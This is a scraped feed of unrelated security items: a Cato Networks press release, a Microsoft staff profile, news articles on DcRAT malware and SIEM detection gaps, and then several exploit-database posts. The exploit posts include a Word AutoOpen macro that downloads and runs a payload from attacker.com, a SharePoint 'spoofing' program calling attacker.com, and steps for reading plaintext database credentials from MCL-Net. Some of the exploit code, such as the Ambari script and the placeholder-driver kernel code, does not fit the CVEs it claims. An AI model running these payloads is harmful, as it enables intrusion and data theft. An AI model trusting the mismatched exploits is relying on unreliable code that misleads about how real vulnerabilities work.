The combination of data science expertise, cloud resources, and Cato's vast data lake enables real-time, ML-powered protection against evasive cyberattacks, reducing risk and improving security.

**TEL AVIV, Israel, June 27, 2023** — Cato Networks, provider of the world's leading single-vendor SASE platform, introduced today real-time, deep learning algorithms for threat prevention as part of Cato IPS. The algorithms leverage Cato's unique cloud-native platform and vast data lake to provide highly accurate identification of malicious domains, which are often used in phishing and ransomware attacks. In testing, the deep learning algorithms identified nearly six times more malicious domains than reputation feeds alone. Cato's Security Research Manager, Avidan Avraham, and Cato Data Scientist Asaf Fried presented on the use of machine learning to detect C2 communications at the AWS Summit in Tel Aviv.

**Tapping Deep Learning to Stop Phishing and Ransomware Attacks**

Real-time identification of malicious domains and IPs is essential to stopping phishing, ransomware, and other cyber threats. The traditional approach – relying on domain reputation feeds to categorize and identify malicious domains – has proven far too inaccurate as domain generation algorithms (DGAs) enable attackers to quickly generate new domains, which lack reputation. At the same time, users continue to click through to malicious domains mimicking well-known brands (such as microsoftt\[dot\]com or amazonlink\[dot\]online) whose lack of reputation also makes detection by reputation feeds alone unreliable. 

Cato's real-time, deep-learning algorithms address both problems. The algorithms prevent access to DGA-registered domains by identifying those new domains infrequently visited by users and with letter patterns common to DGAs. They block cybersquatting by hunting for domains with letter patterns similar to well-known brands. And the algorithms stop brand impersonation by examining parts of the webpage, such as the favicon, images, and text. 

These radical advancements in network security are enabled by the cloud-native architecture of Cato’s technology. Real-time deep learning algorithms require significant compute resources to avoid disrupting the user experience. The Cato SASE Cloud provides those resources. In milliseconds, Cato inspects flows, extracts their destination domain, measures the domain's risk, and infers the necessary results from the traffic without disrupting the user experience. 

At the same time, deep learning models need extensive training data. The massive data lake underlying Cato SASE Cloud provides that resource. Built from the metadata of every flow traversing Cato and further enriched by 250+ threat intelligence feeds, the deep learning algorithms benefit from analyzing patterns across all Cato customers. Those insights are further enhanced by custom analyses derived from customers' traffic—the result: precise, algorithmic identification of suspicious domains. 

**Real-time Deep Learning Yields 6X Improvement in Threat Detection**

Cato Research Labs routinely observes tens of millions of network connection attempts to DGA domains from across the 1700+ enterprises using the Cato SASE Cloud. For example, of the 457,220 network connection attempts to DGA domains made in a sample period, only 66,675 (15 percent) were listed in the 250+ threat intelligence feeds consumed by Cato. By contrast, Cato algorithms identified the rest, over 390,000 additional DGA domains, a nearly six-fold improvement.

**Real-time, Deep Learning: Just One Part of Cato’s Multitiered Security Protection **

Cato's real-time, deep learning algorithms are not the only way Cato detects and stops threats. The Cato SASE Cloud's combination of SWG, NGFW, IPS, NGAM, CASB, DLP, RBI, and ZTNA provides multitiered protection against exploitations, disrupting cyberattacks at multiple points in MITRE's ATT&CK Framework.

The deep learning algorithms are the latest AI and ML additions to the Cato SASE Cloud. Cato has long used machine learning for offline analysis to solve problems at scale, such as OS detection, client classification, and automatic application identification. ChatGPT is also used in various ways, including automatically generating descriptions of threats for Cato's threat catalog. 

To learn more about Cato and its security capabilities, visit https://www.catonetworks.com/security-service-edge/.

**Supporting Quotes**

**Elad Menahem, senior director of security, Cato Networks**

"ML and AI are essential to defending against the ever-evolving, sophisticated, and evasive cyber-attacks. But that’s easier marketed than done,” says Elad Menahem, senior director of security at Cato Networks. “ML algorithms must be trained and re-trained on high-quality data to provide value. Cato’s data lake provides an enormous advantage in that area. Its convergence of rich networking data and security sources, coupled with its sheer scale, enables Cato to train algorithms in unique ways. Our current work is only the start of AI and ML innovation.” 

**Asaf Fried, Data Scientist, Cato Networks**

"Real-time ML must be continuously trained and updated to deal effectively with evasive attacks. A SASE cloud allows training on quality data at scale and continuous updates. Appliance-based solutions can’t offer either, making enterprises who rely on them for their network security an easier target."

**Supporting Resources**

*   Read Cato Blog 
*   Read about Elad Menahem
*   Read about Asaf Fried

*   For more information about Cato's news and activities, follow the company via Twitter, LinkedIn, Facebook, Instagram, and YouTube. 

**About Cato Networks**  
Cato provides the world's most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, into a global cloud service. Cato SASE Cloud optimizes and secures application access for all users and locations everywhere. Using Cato, customers easily replace costly and rigid legacy MPLS with modern network architecture based on SD-WAN, secure and optimize a hybrid workforce working from anywhere, and enable seamless cloud migration. Cato enforces granular access policies, protects users against threats, and prevents sensitive data loss, all easily managed from a single pane of glass. With Cato, businesses are ready for whatever's next.

Cato Networks Revolutionizes Network Security With Real-Time, Machine Learning-Powered Protection

Facts about Aditi Shah:
Tools she uses: Aditi’s main tool is JAWS, a screen reader from Freedom Scientific, which she touts as the best in the market. This tool has made her digital life more manageable, enabling her to perform almost any task independently.
Aditi also uses Seeing AI, a Microsoft app that she uses for important life tasks, like reading her mail, providing descriptions of different products, identifying colors for her outfits, and more.

**Facts about Aditi Shah:**

**Tools she uses:** Aditi’s main tool is JAWS, a screen reader from Freedom Scientific, which she touts as the best in the market. This tool has made her digital life more manageable, enabling her to perform almost any task independently.

Aditi also uses Seeing AI, a Microsoft app that she uses for important life tasks, like reading her mail, providing descriptions of different products, identifying colors for her outfits, and more.

**Where you’ll find her on a Saturday night:** Aditi loves audio card and board games, like poker and Texas Hold ‘Em (which she rarely loses). On Saturday night, you’ll find her playing games with her friends virtually.

**Literary aficionado:** Aditi reads at least one book every week. From murder mysteries and sci-fi sagas to enlightening self-help and spiritual books, she embraces a wide array of genres.

**Role models:** From tech titans to personal mentors, Aditi draws inspiration from a diverse group of individuals: Satya Nadella’s bold approach to cultivating culture at Microsoft, which includes helping people growth together, Elon Musk’s controversial but thought-provoking first principles, and the influential mentor at Microsoft, Abhilasha, who taught her to lead without authority and inspire greatness in those around her.

**Music** Aditi loves jamming to Bollywood music, particularly tracks by Arijit, and occasionally indulges in a bit of Taylor Swift. Her playlists are always full of surprises!

**What’s next?** Aditi wants to keep scaling beyond what she thinks she can and cannot do. She wants to embark on more outdoor activities and travel more independently in the near future.

> “Check your unconscious bias about people with disabilities. Look at people’s abilities instead of focusing on their disabilities.”

Aditi Shah has reshaped the conventional narrative of what it means to be a cybersecurity leader. From steering machine learning automations to pioneering work in AI for cybersecurity, she has left an indelible mark on the industry in just a few years into her career. Beyond her technical prowess, she’s also a fervent advocate for inclusivity and accessibility, driving key initiatives within Microsoft and the tech industry.  Her journey, underpinned by her resilience and determination, is not just a personal triumph, but an inspiration for countless others in the field.

Hailing from Mumbai, India, Aditi was a nerdy kid who always dreamed of pursuing her passion for computers to become a software engineer. Then, at 11, Aditi’s life slowly started to change, when she started tripping over objects and required larger text. Although Aditi’s parents thought she was perhaps a bit absent-minded, a visit to the ophthalmologist led Aditi to life-changing news: she had Retinitis Pigmentosa and would slowly lose her vision. At the age of 15, Aditi lost her sight completely. With no blind role models to guide her, Aditi forged her own path.

An affliction that could’ve derailed her dreams only served to strengthen them, paving the way for a journey she’d never envisaged before, one she would embark upon with unwavering resolve and courage. Aditi’s mother recorded her textbooks onto audio cassettes, enabling her to continue her education despite diminishing sight. Fueled by perseverance and an unwavering will, Aditi’s drive to succeed led to her being one of the top 3 students in the city of Mumbai. After high school, she pursued a bachelor’s and master’s degree in I.T. at the University of Mumbai, becoming the first blind student to study STEM at the University.

Being a trailblazer had its challenges. There were no other blind students in STEM that Aditi could share experiences with and no accessible study materials. Aditi only had access to very rudimentary screen reader technology. Nevertheless, Aditi addressed these challenges head-on, learning the invaluable lessons of persistence no matter the odds, which would continue to serve her well throughout her career.

Despite graduating at the top of her class, the “real world” slammed its doors in Aditi’s face. Companies refused to interview her due to her blindness, assuming that she wouldn’t be able to work as a software engineer. Aditi pivoted and carved out a successful career as a freelancer, which eventually led to a full-time role at an enterprise security solutions company, where she had the opportunity to eventually lead all of product development.

Aditi wanted to go deeper into security, which led to her making a big move to study cybersecurity at Georgia Tech, marking her first experience living alone. She ran into a new set of challenges, such as learning to walk with a white cane, cooking, furnishing her apartment, and more. Despite these challenges, Aditi once again persevered and graduated with a 4.0, and landed a summer internship with Microsoft, which led to a full-time offer in Redmond, Washington.

What sparked Aditi’s fascination for cybersecurity was the need to be a polymath, to know everything. She reveled in the fact that proficiency in cybersecurity demanded a wide range of skills – everything from computer science to operating systems, networks, and databases. She felt a magnetic pull to the field since every creation needs to be secure and the prospect of an ever-evolving landscape of learning and application invigorated her. Schooling taught her the basics, but her thirst for knowledge led her to delve deeper into the hacking world and adopt the security mindset. This fresh perspective made her look at everything through a different lens, always probing, “How can this be broken?”

The current state of security can be overwhelming, yet Aditi saw it as a call to action. The digital transformation, especially accelerated by the Covid-19 pandemic massively increased the attack surface, outstripping the human capacity for response. This stark reality spurred Aditi towards AI as a solution. She saw the need of AI-centric defense, understanding both sides of the coin–thinking as a defender to secure systems, and from the offensive security side to anticipate breaches. As a researcher, she pondered how AI solutions could be harnessed to thwart bad actors and amplify the good ones.

Aditi’s work on machine learning over three years made her realize its potential to think in thousands of dimensions, something humans are incapable of. The ability to use AI to sift through vast amounts of data, cut through the noise, and zero in on key signals is game-changing. Aditi recently worked on the Microsoft Security Copilot, using GPT to empower incident responders to protect customers.

The future of AI, Aditi believes, is akin to electricity—it will power everything. It’s imperative that AI is safe, secure, and fair for all. This challenge is likely to be Aditi’s next adventure, a quest to safeguard the world’s AI systems.

In addition to her regular job responsibilities at Microsoft, Aditi is also deeply committed to making a difference in her community. Within Microsoft, she co-chairs the disability Employee Resource Group for Microsoft Security and is also part of the Microsoft Security Diversity & Inclusion Council, tirelessly working to create an inclusive environment for all types of disabilities.

Recognizing the lack of representation in tech and cybersecurity, Aditi took it upon herself to address the issue from its roots. She collaborates with nonprofits like Our Space, Our Place and Vision-Aid, which focus on underprivileged children and those with disabilities, especially in remote parts of India. Through these endeavors, Aditi helps these children get the support and motivation they need to develop their skills and increase their employability.

Aditi’s story is a powerful testament to her never-ceasing hunger for knowledge and her unwavering dedication to breaking barriers. Today, she is not only a cybersecurity and AI expert, but an inspiring role model for countless others with disabilities navigating their own paths. She also has an important message for allies in the tech industry: “check your unconscious bias about people with disabilities. Look at people’s abilities instead of focusing on their disabilities.” Aditi’s message to people who are blind or visually impaired is simple yet powerful: “Don’t let anything limit your potential.”

Aditi would love to hear from anyone who could benefit from discussion with her, which would include individuals with disabilities or someone who wants a career in AI and security. You can reach out to Aditi via her LinkedIn profile: Aditi Shah | LinkedIn

Breaking Barriers: Aditi’s Journey Through Sight Loss to Microsoft AI Innovator

By Habiba Rashid
DcRAT malware includes a ransomware plugin that encrypts non-system files, rendering them inaccessible without the decryption key, which threat actors will likely hold for ransom.
This is a post from HackRead.com Read the original post: Hackers Hiding DcRAT Malware in Fake OnlyFans Content

**The modus operandi of this campaign involves luring victims with explicit OnlyFans content, specifically targeting users who engage with adult-oriented materials.**

A malicious campaign targeting smartphone users has been uncovered, utilizing fake OnlyFans content to distribute a dangerous Remote Access Trojan (RAT) known as DcRAT malware. The campaign, which has been active since January 2023, poses a significant risk to users’ devices and personal data.

eSentire, a leading cybersecurity firm, has been at the forefront of uncovering this threat. The company’s Threat Response Unit (TRU) identified the presence of DcRAT, a variant of the widely available AsyncRAT, within a consumer services customer’s system. DcRAT is a potent remote access tool with info-stealing and ransomware capabilities.

**OnlyFans Content Used as Lure**

The modus operandi of this campaign involves luring victims with explicit OnlyFans content, specifically targeting users who engage with adult-oriented materials. Victims are enticed to download ZIP files containing a VBScript loader, which they manually execute, believing it will grant them access to premium OnlyFans content. Unbeknownst to them, this action initiates the installation of the DcRAT Trojan, giving hackers remote control over their devices.

DcRAT presents a multifaceted threat to compromised systems. It can perform keylogging, monitor webcams, manipulate files, remotely access devices, and pilfer web browser credentials, cookies, and Discord tokens.

Furthermore, DcRAT malware includes a ransomware plugin that encrypts non-system files, rendering them inaccessible without the decryption key, which threat actors will likely hold for ransom.

The ransomware plugin of the DcRAT malware analyzed by eSentire

**How the Malware is Being Spread**

The precise method of infection remains uncertain, but experts speculate that malicious forum posts, instant messages, malvertising, or search engine optimization techniques may serve as potential attack vectors. This underscores the importance of exercising caution while browsing the internet, avoiding unfamiliar links, and refraining from interacting with suspicious individuals online.

**Protective Measures to Stay Safe**

To mitigate the risks associated with this malware campaign, eSentire’s TRU team recommends several proactive measures. Users are advised to undergo Phishing and Security Awareness Training (PSAT) to identify and report potentially malicious content accurately.

Additionally, it is recommended to restrict the execution of script files, such as .vbs, and configure systems to open script files with trusted applications like Notepad.

Furthermore, maintaining up-to-date antivirus signatures and utilizing Next-Generation Antivirus (NGAV) or Endpoint Detection and Response (EDR) tools can provide an added layer of protection against emerging threats. Users should also ensure their devices are regularly updated, as these updates often include critical security patches.

**The Need for Vigilance and Awareness**

The discovery of this campaign highlights the ever-evolving nature of cyber threats and serves as a reminder that users must remain vigilant to safeguard their personal data. By staying informed and adopting best practices for online safety, individuals can better protect themselves from the growing menace of malware and data breaches.

As the battle between cybercriminals and cybersecurity professionals continues, it is crucial to prioritize proactive measures and maintain a robust security posture in the face of evolving threats.

1.  Terabytes of OnlyFans data being sold on hacking forum
2.  Warning: Fake GitHub Repos Delivering Malware as PoCs
3.  Microsoft Teams Flaw Sends Malware to Employees’ Inboxes
4.  Chinese Malware Targets European Healthcare via USB Drives
5.  Diicot Threat Group Hit SSH Servers with Brute-Force Malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Hackers Hiding DcRAT Malware in Fake OnlyFans Content

Organizations are largely deluded about their own security postures, according to an analysis, with the average SIEM failing to detect a whopping 76% of attacker TTPs.

Despite enterprises' best efforts to shore up their security information and event management (SIEM) postures, most platform implementations have massive gaps in coverage, including missing more than three-quarters of the common techniques that threat actors use to use to deploy ransomware, steal sensitive data, and execute other cyberattacks.

Researchers from CardinalOps analyzed data from production SIEM platforms from companies such as Splunk, Microsoft Sentinel, IBM QRadar, and Sumo Logic, and found that they have detections for just 24% of all MITRE ATT&CK techniques. That means that adversaries can execute about 150 different techniques that can bypass SIEM detection, while only about 50 techniques are spotted, the researchers said.

This is despite the fact that current SIEM systems actually do take in sufficient data to cover potentially 94% of all these techniques, CardinalOps revealed as part of the company's "Third Annual Report on the State of SIEM Detection Risk," released today.

Moreover, organizations are largely deluded about their own security postures and "are often unaware of the gap between the theoretical security they assume they have and the actual security they have in practice," the researchers wrote in the report. This creates "a false impression of their detection posture."

MITRE ATT&CK is a global knowledge base of adversary tactics and techniques based on real-world observations that's aimed at helping organizations detect and mitigate cyberattacks. The report's data is the result of analysis of more than 4,000 detection rules, nearly 1 million log sources and hundreds of unique log source types used in SIEM across a range of diverse industry verticals — including banking and financial services, insurance, manufacturing, energy, and media and telecommunications.

**A Lack of SIEM Fine-Tuning to Blame for Detection Fails**

The key issue contributing to the current state of SIEM efficacy (or lack thereof) seems to be that even though resources exist for organizations to use knowledge, automation, and other processes to detect adversaries and potential attacks on their environments, they still largely rely on manual and other "error-prone" processes for developing new detections, the researchers noted. This makes it difficult to reduce their backlogs and act quickly to fill gaps in detection.

Indeed, SIEMs themselves "are not magic" and rely on the organizations deploying them to do so correctly and efficiently, notes Mike Parkin, senior technical engineer at Vulcan Cyber, a security-as-a-service provider of enterprise cyber-risk remediation.

"Like most tools, they require fine-tuning to deliver the best results for the environment they’re deployed in," he says. "These report results imply that many organizations have gotten the basics working but haven’t done the fine-tuning necessary to take their detection, response, and risk management strategies to the next level."

In addition to the need to scale detection-engineering processes to develop more detections faster, one key issue that seems to be tripping up detection in enterprise SIEM deployments is that on average, they have 12% of rules that are broken, which means they will never file an alert when something is amiss, according to the report.

"This commonly occurs due to ongoing changes in the IT infrastructure, vendor log format changes, and logical or accidental errors in writing a rule," the researchers noted in the report. "Adversaries can exploit gaps created by broken detections to successfully breach organizations."

**Why MITRE ATT&CK Matters**

MITRE ATT&CK, created in 2013, has now "become the standard framework for understanding adversary playbooks and behavior," the researchers noted. And as threat intelligence has advanced, so has the wealth of knowledge the framework provides, currently describing more than 500 techniques and sub-techniques used by threat groups such as APT28, the Lazarus Group, FIN7, and Lapsus$.

"The biggest innovation introduced by MITRE ATT&CK is that it extends the traditional intrusion kill chain model to go beyond static indicators of compromise (like IP addresses, which attackers can change constantly) to catalog all known adversary playbooks and behaviors (TTPs)," the CardinalOps researchers wrote.

Organizations clearly see the value in using MITRE ATT&CK to help them in their security efforts, with 89% currently using the knowledge base to reduce risk for security-operations use cases — such as determining priorities for detection engineering, applying threat intelligence to alert triage, and gaining a better understanding of adversary TTPs, the researchers noted, citing Enterprise Strategy Group (ESG) research.

However, using the framework to support SIEM efforts and using it well appear to be two very different scenarios, the report found.

**Closing the SIEM Gap**

There are steps that organizations can take to help close the gap between what a SIEM is capable of in terms of cyberattack detection, and how they currently are using it, researchers and security experts said.

One key strategy would be to scale SIEM detection-engineering processes to develop more detections faster using automation, something that companies already use widely to great effect in "multiple areas of the SOC, such as anomaly detection and incident response," but not so much in detection, they noted in the report.

"The detection-engineering function remains stubbornly manual and typically dependent on 'ninjas' with specialized expertise," the researchers wrote.

Indeed, having a focus on automation is critical to achieving goals with limited human and financial resources, agrees one security expert.

"This includes expanding automated detection to include Internet of things (IoT) and operational technology (OT) attack vectors, as well as having plans already in place for automated threat remediation," says John Gallagher, vice president of Viakoo Labs at Viakoo.

One key challenge that organizations continue to face is that the current attack surface — which now includes large numbers of vulnerable network-connected devices as well as the typical enterprise network — has grown well past what the IT organization is currently capable of supporting or managing, Gallagher says.

"To defend and maintain the integrity of those assets requires IT working closely with other parts of the organization to ensure those assets are visible, operational, and secure," he says.

Indeed, Parkin observes, until organizations can get a clear picture of their threat surfaces, manage their risk, and prioritize events to focus on what matters most, there will be problems.

"We have the tools to make it happen," he says. "But it can be a challenge to get them deployed and configured for best effect."

Most Enterprise SIEMs Blind to MITRE ATT&CK Tactics

Microsoft 365 MSO version 2305 build 16.0.16501.20074 suffers from a remote code execution vulnerability.

    ## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)64-bit Remote Code Execution Vulnerability## Author: nu11secur1ty## Date: 04.17.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/## CVE-2023-28285## Description:The attack itself is carried out locally by a user with authenticationto the targeted system. An attacker could exploit the vulnerability byconvincing a victim, through social engineering, to download and opena specially crafted file from a website which could lead to a localattack on the victim's computer. The attacker can trick the victim toopen a malicious web page by using a malicious `Word` file for`Office-365 API`. After the user will open the file to read it, fromthe API of Office-365, without being asked what it wants to activate,etc, he will activate the code of the malicious server, which he willinject himself, from this malicious server. Emedietly after thisclick, the attacker can receive very sensitive information! For bankaccounts, logs from some sniff attacks, tracking of all the traffic ofthe victim without stopping, and more malicious stuff, it depends onthe scenario and etc.STATUS: HIGH Vulnerability[+]Exploit:The exploit server must be BROADCASTING at the moment when the victimhit the button of the exploit![+]PoC:```cmdSub AutoOpen()    Call Shell("cmd.exe /S /c" & "curl -shttp://attacker.com/CVE-2023-28285/PoC.debelui | debelui",vbNormalFocus)End Sub```## FYI:The PoC has a price and this report will be uploaded with adescription and video of how you can reproduce it only.## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)## Time spend:01:30:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

Microsoft Microsoft Windows 11 version 22h2 suffers from a kernel privilege escalation vulnerability.

    // Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : webapps// Vendor Homepage:// Tested on: Windows/Linux// CVE : CVE-2023-28293#include <windows.h>#include <stdio.h>// The vulnerable driver file nameconst char *driver_name = "vuln_driver.sys";// The vulnerable driver device nameconst char *device_name = "\\\\.\\VulnDriver";// The IOCTL code to trigger the vulnerability#define IOCTL_VULN_CODE 0x222003// The buffer size for the IOCTL input/output data#define IOCTL_BUFFER_SIZE 0x1000int main(){    HANDLE device;    DWORD bytes_returned;    char input_buffer[IOCTL_BUFFER_SIZE];    char output_buffer[IOCTL_BUFFER_SIZE];    // Load the vulnerable driver    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))    {        printf("Error loading vulnerable driver: %d\n", GetLastError());        return 1;    }    // Open the vulnerable driver device    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);    if (device == INVALID_HANDLE_VALUE)    {        printf("Error opening vulnerable driver device: %d\n", GetLastError());        return 1;    }    // Fill the input buffer with data to trigger the vulnerability    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);    // Send the IOCTL to trigger the vulnerability    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))    {        printf("Error sending IOCTL: %d\n", GetLastError());        return 1;    }    // Print the output buffer contents    printf("Output buffer:\n%s\n", output_buffer);    // Unload the vulnerable driver    if (!UnloadDriver("\\Driver\\VulnDriver"))    {        printf("Error unloading vulnerable driver: %d\n", GetLastError());        return 1;    }    // Close the vulnerable driver device    CloseHandle(device);    return 0;}BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name){    SC_HANDLE sc_manager, service;    DWORD error;    // Open the Service Control Manager    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);    if (sc_manager == NULL)    {        return FALSE;    }    // Create the service    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);    if (service == NULL)    {        error = GetLastError();        if (error == ERROR_SERVICE_EXISTS)        {            // The service already exists, so open it instead            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);            if (service == NULL)            {                CloseServiceHandle(sc_manager);                return FALSE;            }        }        else        {            CloseServiceHandle(sc_manager);            return FALSE;        }    }    // Start the service    if (!StartService(service, 0, NULL))    {        error = GetLastError();        if (error != ERROR_SERVICE_ALREADY_RUNNING)        {            CloseServiceHandle(service);            CloseServiceHandle(sc_manager);            return FALSE;        }    }    CloseServiceHandle(service);    CloseServiceHandle(sc_manager);    return TRUE;}BOOL UnloadDriver(LPCTSTR service_name){    SC_HANDLE sc_manager, service;    SERVICE_STATUS status;    DWORD error;    // Open the Service Control Manager    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);    if (sc_manager == NULL)    {        return FALSE;    }    // Open the service    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);    if (service == NULL)    {        CloseServiceHandle(sc_manager);        return FALSE;    }    // Stop the service    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))    {        error = GetLastError();        if (error != ERROR_SERVICE_NOT_ACTIVE)        {            CloseServiceHandle(service);            CloseServiceHandle(sc_manager);            return FALSE;        }    }    // Delete the service    if (!DeleteService(service))    {        CloseServiceHandle(service);        CloseServiceHandle(sc_manager);        return FALSE;    }    CloseServiceHandle(service);    CloseServiceHandle(sc_manager);    return TRUE;}

Microsoft Windows 11 22h2 Kernel Privilege Escalation

Azure Apache Ambari version 2302250400 suffers from a spoofing vulnerability.

    # Exploit Title: Azure Apache Ambari 2302250400 - Spoofing# Date: 2023-06-23# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : Remote# Vendor Homepage:MicrosoftApache AmbariMicrosoft azure Hdinsights# Tested on: Windows/Linux# CVE : CVE-2023-23408import requests# Set the URL and headers for the Ambari web interfaceurl = "https://ambari.example.com/api/v1/clusters/cluster_name/services"headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}# Define a function to validate the headersdef validate_headers(headers):    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":        return False    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":        return False    return True# Define a function to send a request to the Ambari web interfacedef send_request(url, headers):    if not validate_headers(headers):        print("Invalid headers")        return    response = requests.get(url, headers=headers)    if response.status_code == 200:        print("Request successful")    else:        print("Request failed")# Call the send_request function with the URL and headerssend_request(url, headers)

Azure Apache Ambari 2302250400 Spoofing

MCL-Net version 4.3.5.8788 suffers from an information disclosure vulnerability.

    # Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure# Date: 5/31/2023# Exploit Author: Victor A. Morales, GM Sectec Inc.# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php# Version: 4.3.5.8788 (other versions may be affected)# Tested on: Microsoft Windows 10 Pro# CVE: CVE-2023-34834Description:Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.Steps to reproduce:1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 2. Browse to the "/file" directory and database entry folders configured3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.

MCL-Net 4.3.5.8788 Information Disclosure

Microsoft SharePoint Enterprise Server 2016 suffers from a spoofing vulnerability.

    // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : Remote// Vendor Homepage:// Microsoft SharePoint Foundation 2013 Service Pack 1// Microsoft SharePoint Server Subscription Edition// Microsoft SharePoint Enterprise Server 2013 Service Pack 1// Microsoft SharePoint Server 2019// Microsoft SharePoint Enterprise Server 2016// Tested on: Windows/Linux// CVE : CVE-2023-28288#include <windows.h>#include <stdio.h>// The vulnerable SharePoint server URLconst char *server_url = "http://example.com/";// The URL of the fake SharePoint serverconst char *fake_url = "http://attacker.com/";// The vulnerable SharePoint server file nameconst char *file_name = "vuln_file.aspx";// The fake SharePoint server file nameconst char *fake_file_name = "fake_file.aspx";int main(){    HANDLE file;    DWORD bytes_written;    char file_contents[1024];    // Create the fake file contents    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");    // Write the fake file to disk    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating fake file: %d\n", GetLastError());        return 1;    }    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))    {        printf("Error writing fake file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Send a request to the vulnerable SharePoint server to download the file    sprintf(file_contents, "%s%s", server_url, file_name);    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating vulnerable file: %d\n", GetLastError());        return 1;    }    if (!InternetReadFileUrl(file_contents, file))    {        printf("Error downloading vulnerable file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Replace the vulnerable file with the fake file    if (!DeleteFile(file_name))    {        printf("Error deleting vulnerable file: %d\n", GetLastError());        return 1;    }    if (!MoveFile(fake_file_name, file_name))    {        printf("Error replacing vulnerable file: %d\n", GetLastError());        return 1;    }    // Send a request to the vulnerable SharePoint server to trigger the vulnerability    sprintf(file_contents, "%s%s", server_url, file_name);    if (!InternetReadFileUrl(file_contents, NULL))    {        printf("Error triggering vulnerability: %d\n", GetLastError());        return 1;    }    // Print a message indicating that the vulnerability has been exploited    printf("Vulnerability exploited successfully.\n");    return 0;}BOOL InternetReadFileUrl(const char *url, HANDLE file){    HINTERNET internet, connection, request;    DWORD bytes_read;    char buffer[1024];    // Open an Internet connection    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);    if (internet == NULL)    {        return FALSE;    }    // Connect to the server    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);    if (connection == NULL)    {        InternetCloseHandle(internet);        return FALSE;    }    // Send the HTTP request    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);    if (request == NULL)    {        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    if (!HttpSendRequest(request, NULL, 0, NULL, 0))    {        InternetCloseHandle(request);        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    // Read the response data    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)    {        if (file != NULL)        {            // Write the data to disk            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))            {                InternetCloseHandle(request);                InternetCloseHandle(connection);                InternetCloseHandle(internet);                return FALSE;            }        }    }    InternetCloseHandle(request);    InternetCloseHandle(connection);    InternetCloseHandle(internet);    return TRUE;}

Microsoft SharePoint Enterprise Server 2016 Spoofing

